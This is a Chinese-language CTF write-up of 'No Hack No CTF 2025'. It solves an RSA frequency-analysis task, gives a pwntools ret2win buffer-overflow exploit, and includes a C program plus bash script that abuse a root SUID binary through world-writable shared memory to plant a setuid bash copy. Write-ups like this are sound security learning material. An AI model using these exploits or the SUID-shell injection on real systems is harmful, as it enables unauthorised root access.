No Hack No CTF 2025#

這次題目我主要都是圍繞在Pwn、Reverse、Crypto，但Reverse解不出來不是我熟悉的ELF跟EXE

Crypto#

[100] bloCkchAin ciphEr’S sERcret#

合約題

流程大概就是丟網站->拿到HEX->解出flag

[316] FRSA#

題目給了加密腳本FRSA.py和加密結果so_wonderful_work.txt

FRSA.py:

1
from Crypto.Util.number import *
2
from random import *
3

4
p = getStrongPrime(1024)
5
q = getStrongPrime(1024)
6
n = p*q
7
e = randrange(2**512,2**1024)
8

9
plaintext = open('wonderful_work.txt','r').read().lower()
10
arr = []
11
for i in plaintext:
12
        arr.append(pow(ord(i),e,n))
13
open('so_wonderful_work.txt','w').write(str(n)+"\n"+str(arr))

so_wonderful_work.txt的經過簡單觀察，有分要還原的密文跟有著30多萬字元由[]包起來映射。

而這段程式碼的弱點在於 for i in plaintext: 迴圈。它將明文中的每個字元（例如，所有的 ‘a’）都獨立加密成完全相同的密文。這意味著，只要我們能統計出哪個密文出現最多次，就能推斷出它對應哪個最常見的英文字元。

所以就生一個架構，一直去手動測試，然後再好幾個小時的努力就可以還原文

腳本運行結果:

1
================================================================================
2
目前的對照表: '6405299485...' -> 'o'  '0646033379...' -> 'c'  '7693470592...' -> 'r'  '8544458474...' -> 'n'  '5487013167...' -> 'h'  '8542905841...' -> 'u'  '7534940872...' -> 'b'  '5802447197...' -> 'a'  '5720443804...' -> 'i'  '4296177043...' -> 't'  '1335244995...' -> 'e'  '7978034037...' -> ' '  '8956932056...' -> 's'
3

4
--- 部分解密文本 (僅顯示前 500 字元) ---
5
in _enera_ _o_taire said this inad_ertent_y a _ew __ies bite a _ew ti_es ne_er can detain a heroic _a__o_in_ horse this see_s to _a_e a _ot o_ sense ri_ht the _uic_ brown _o_ _u__s o_er the _a_y do_ de_ocritus once said this dont _oo_ at e_eryone with distrust but be _ir_ and _ir_ this is indeed a wise sayin_ then what ba_ehot once said a _ir_ be_ie_ can _a_e the heart o_ the stron_ _ir_ and they are _ore deter_ined a_thou_h this sentence is short it _a_es _e thin_ about it why does nhncthisisrsaand_re_uencyana_ysis ha__en
6
---

還原出差不多10的字母就大該猜到了是nhncthisisrsaandfrequencyanalysis

所以flag就是NHNC{THIS_IS_RSA_AND_FREQUENCY_ANALYSIS}

Pwn#

[253] clannad_is_g00d_anim3#

運氣好搶到首殺

source code:

1
#include <stdio.h>
2
#include <string.h>
3
#include <stdlib.h>
4

5
char *gets(char *s);
6

7
int Clannad(){
8
  system("/bin/sh");
9
}
10

11
int vuln(){
12
  char buffer[64];
13
  printf("Welcome to the world of dango daikazoku\n");
14
  printf("enter a dango:");
15
  gets(buffer);
16
}
17

18
int main(){
19
  setvbuf(stdout, 0, 2, 0);
20
  setvbuf(stdin, 0, 2, 0);
21
  setvbuf(stderr, 0, 2, 0);
22

23
  vuln();
24
  printf("Hello\n");
25
  return 0;
26
}

其實就真的是非常簡單的ret2win，但題目沒有給執行檔，所以可以從Docker裡面翻看看是怎麼編譯的。

gcc /home/ctf/chall.c -o /home/ctf/chall -fno-stack-protector -z execstack -no-pie

exp:

1
from pwn import *
2

3
context.arch='amd64'
4
r=remote('chal.78727867.xyz',9999)
5
#r=process('./chall')
6

7
p=b'A'*72+p64(0x40101a)+p64(0x4011b6)
8
#gdb.attach(r)
9
r.sendlineafter(b':',p)
10

11
r.interactive()

到底這題為什麼沒有貶到100分?

[475] Server Status#

跟Server Status Revenge一模一樣解法，先解比較難題目的好處?

[484] Server Status Revenge#

題目給了個SSH，連線到伺服器後，發現家目錄下只有一個名為 server_status 的檔案，執行 ./server_status，得到以下輸出：

1
=== Server Status Monitor v1.0 ===
2
System diagnostic tool with root privileges
3
Running with elevated privileges (UID: 0, GID: 0)
4
...
5
=== Command Output ===
6
dmesg: read kernel buffer failed: Operation not permitted
7
=== End of Output ===
8
...

所以可以猜測這是一題利用 SUID+Privilege Escalation漏洞，打開家目錄也果然有flag。因為題目沒有任何逆向工具，所以我是直接cat server_status，然後可以看到很多亂碼跟大量與共享記憶體相關的函式shmget, shmat, shmdt,popen。

所以可以假設初步結論是一個SUID root程式，它會從共享記憶體中讀取一個指令，然後用popen執行它。

ps:

shmget：取得共享記憶體段。
shmat：將共享記憶體段 attach 到自己的記憶體空間。
shmdt：detach。
popen：開啟一個 subprocess 並且可以讀取它的輸出

直接說結論，使用watch -n 0.1 ipcs -m，發現可以成功在 server_status執行時捕捉到了它所創建的共享記憶體區段，並發現每次執行其Key值都不同，而且其權限為666，代表任何使用者都可以讀寫。

所以我們思路就是構造可以自動偵測->提取key->注入的腳本。

write.c:

1
#include <stdio.h>
2
#include <stdlib.h>
3
#include <string.h>
4
#include <sys/ipc.h>
5
#include <sys/shm.h>
6

7
int main(int argc, char *argv[]) {
8
    if (argc != 2) return 1;
9

10
    key_t key = (key_t)strtol(argv[1], NULL, 0);
11
    const char* cmd = "cp /bin/bash /tmp/rootshell; chmod +s /tmp/rootshell";
12

13
    int shmid = shmget(key, 1024, 0666);
14
    if (shmid == -1) return 1;
15

16
    char *shmaddr = shmat(shmid, NULL, 0);
17
    if (shmaddr == (void*)-1) return 1;
18

19
    strcpy(shmaddr, cmd);
20
    shmdt(shmaddr);
21
    return 0;
22
}

final_attack.sh

1
#!/bin/bash
2

3
gcc writer.c -o writer
4

5
./server_status &
6

7
#核心攻擊邏輯，用 ipcs、grep、awk 找出動態 Key
8
KEY=""
9
for i in {1..10}; do
10
    KEY=$(ipcs -m | grep 'root' | awk '{print $1}')
11
    if [ ! -z "$KEY" ]; then
12
        break
13
    fi
14
    sleep 0.01
15
done
16

17
if [ ! -z "$KEY" ]; then
18
    echo "Found dynamic key: $KEY, launching attack!"
19
    ./writer $KEY
20
fi

運行結果:

1
hacker@f347792128f8:~$ ./final_attack.sh
2
=== Server Status Monitor v1.0 ===
3
System diagnostic tool with root privileges
4

5
Running with elevated privileges (UID: 0, GID: 0)
6
Initializing...
7
Hacking Nasa...
8
*Found dynamic key: 0x0002216f, launching attack!
9
********************ls: cannot access '/tmp/rootshell': No such file or directory
10
hacker@f347792128f8:~$ *******************
11
Done!
12
=== Command Output ===
13
=== End of Output ===
14

15
System status check completed successfully!
16
^C
17
hacker@f347792128f8:~$ /tmp/rootshell -p
18
cat /flag
19
rootshell-5.1# ls
20
creator    exploit    exploit_final    final_attack.sh  race_final.sh  read_shm_v2.c  writer
21
creator.c  exploit.c  exploit_final.c  race.sh          read_shm_v2    server_status  writer.c
22
rootshell-5.1# cd /
23
rootshell-5.1# ls
24
bin  boot  dev  etc  flag  home  lib  lib32  lib64  libx32  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  userid  usr  var
25
rootshell-5.1# cat flag
26
NHNC{WTF_NEVER_MADE_Challenges_at_night_especially_when_u_r_sleepy_e98525ca34b243ef9c315a1a0861f1cf}rootshell-5.1#

總結#

很幸運搶下所有台灣隊裡面的第一名，當然也不排除厲害的都去出題，總題難度比AIS3 Pre-exam 高上不少，這三天跟隊友24小時不間斷在打題目，白天組解不出來的題目腕上組繼續接手打。